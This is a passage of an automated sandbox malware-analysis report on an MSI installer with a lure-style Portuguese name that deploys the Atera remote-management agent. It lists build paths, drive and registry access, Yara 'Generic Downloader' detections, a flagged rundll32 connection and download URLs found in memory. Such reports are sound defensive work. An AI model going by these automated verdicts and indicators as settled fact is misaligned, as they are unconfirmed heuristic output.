                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.AccessControl\net6.0-windows-Release\System.Security.AccessControl.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: System.Security.AccessControl.ni.pdb source: System.Security.AccessControl.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Diagnostics.DiagnosticSource\net45\System.Diagnostics.DiagnosticSource.pdb source: System.Diagnostics.DiagnosticSource.dll.16.dr
                                Source: Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: .pdbV source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A620000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000E.00000002.1447177311.000001E7283F2000.00000002.00000001.01000000.00000012.sdmp, Pubnub.dll0.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: CliWrap.pdbSHA256X source: CliWrap.dll.26.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdbT*n* `*_CorDllMainmscoree.dll source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdb source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000033.00000000.1978260272.0000024844C32000.00000002.00000001.01000000.0000002A.sdmp
                                Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                Source: C:\Windows\System32\cscript.exeFile opened: c:
                                Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561873h14_2_00007FFAAB560C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561A44h14_2_00007FFAAB560C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561FFFh14_2_00007FFAAB560C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB56227Bh14_2_00007FFAAB560C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561873h14_2_00007FFAAB56184E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561A44h14_2_00007FFAAB56184E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561FFFh14_2_00007FFAAB561EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561FFFh14_2_00007FFAAB561E7E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB561FFFh14_2_00007FFAAB561E88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB584ECBh16_2_00007FFAAB584C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB581873h16_2_00007FFAAB580C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB581A44h16_2_00007FFAAB580C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB581FFFh16_2_00007FFAAB580C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB58227Bh16_2_00007FFAAB580C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB59B572h16_2_00007FFAAB59B1E7
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB59B572h16_2_00007FFAAB59B220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB584ECBh16_2_00007FFAAB584DC8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB581FFFh16_2_00007FFAAB581EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB554ECBh26_2_00007FFAAB554C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB551873h26_2_00007FFAAB550C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB551A44h26_2_00007FFAAB550C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB551FFFh26_2_00007FFAAB550C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB55227Bh26_2_00007FFAAB550C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB56BDE2h26_2_00007FFAAB56BB8E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB554ECBh26_2_00007FFAAB554DC8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB551FFFh26_2_00007FFAAB551EB6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB772EE0h26_2_00007FFAAB772C39
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then jmp 00007FFAAB774859h26_2_00007FFAAB774754
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 4x nop then dec eax26_2_00007FFAAB771FB5

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Yara detected Generic Downloader
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 51.2.AgentPackageTicketing.exe.24845080000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 53.2.AgentPackageProgramManagement.exe.213b3f70000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\netstandard.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, type: DROPPED
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.WATCHDOG/1.5/AGENT.PACKAGE.WATCHDOG.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEADREMOTE/6.0/AGENTPACKAGEADREMOTE.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEHEARTBEAT/17.14/AGENTPACKAGEHEARTBEAT.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMARKETPLACE/1.6/AGENTPACKAGEMARKETPLACE.ZIP
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/36.9/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEOSUPDATES/19.9/AGENTPACKAGEOSUPDATES.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGERUNTIMEINSTALLER/1.6/AGENTPACKAGERUNTIMEINSTALLE
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/23.4/AGENTPACKAGESTREMOTE.ZIP
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881B7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESYSTEMTOOLS/26.8/AGENTPACKAGESYSTEMTOOLS.ZIP
                                Source: AgentPackageSTRemote.exe, 00000020.00000002.2185783714.0000027055A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005265000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A9F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD24DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB83F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB8C1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB82C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B6D7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12E49000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165984EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.comPG
                                Source: AgentPackageTicketing.exe, 00000033.00000002.2571688057.00000248459E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.nuget.org
                                Source: rundll32.exe, 00000006.00000002.1359772261.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1507886552.0000000005265000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582681527.000001FD41A9F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000016.00000002.1582648644.0000026AD24DF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881F0F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB83F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB8C1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1860673712.00000246BB867000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0F61000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E43400F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2143874595.000002139B6D7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2103371672.000001CC12E49000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.0000016598452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2116373812.00000165984EE000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.0000013262A04000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132628E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2274299424.0000010B0013B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blob.ams08prdstr06a.store.core.windows.net
                                Source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp, TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
